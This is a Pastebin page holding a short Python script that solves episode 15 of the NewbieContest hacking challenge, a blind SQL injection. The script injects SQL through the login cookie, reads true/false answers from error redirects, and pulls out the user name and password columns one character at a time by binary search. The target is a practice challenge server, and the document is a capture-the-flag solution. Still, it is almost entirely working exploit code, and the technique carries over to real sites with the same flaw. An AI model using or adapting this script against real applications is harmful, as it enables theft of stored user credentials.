Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3
- # xGeek - NewbieContest ep15 (Blind SQLi)
- import urllib.request
- def getColumn(column,expl,length = None):
- if length is None:
- length = 1
- while not expl('or length({})={}'.format(column,length)):
- length+=1
- # a fast dichotomic search ;)
- debut = 48
- fin = 122
- data = ''
- i = 1
- while i <= length:
- milieu = round((debut+fin)/2)
- if expl('or ascii(substring({},{},1)) > {}'.format(column,i,milieu)):
- debut = milieu+1
- elif expl('or ascii(substring({},{},1)) < {}'.format(column,i,milieu)):
- fin = milieu-1
- else:
- data += chr(milieu)
- i += 1
- debut = 48
- fin = 122
- return data
- def exploit(sqli):
- req = urllib.request.Request('http://hacking.newbiecontest.org:10080/ep15/index.php',None,{'Cookie':'pass=111;login=%2527 {} -- .'.format(sqli)})
- try:
- res = urllib.request.urlopen(req)
- except urllib.error.HTTPError as err:
- if err.geturl() == './erreur_pass.htm':
- return True
- else:
- return False
- print(getColumn('pseudo',exploit))
- print(getColumn('password',exploit))
Advertisement
Add Comment
Please, Sign In to add comment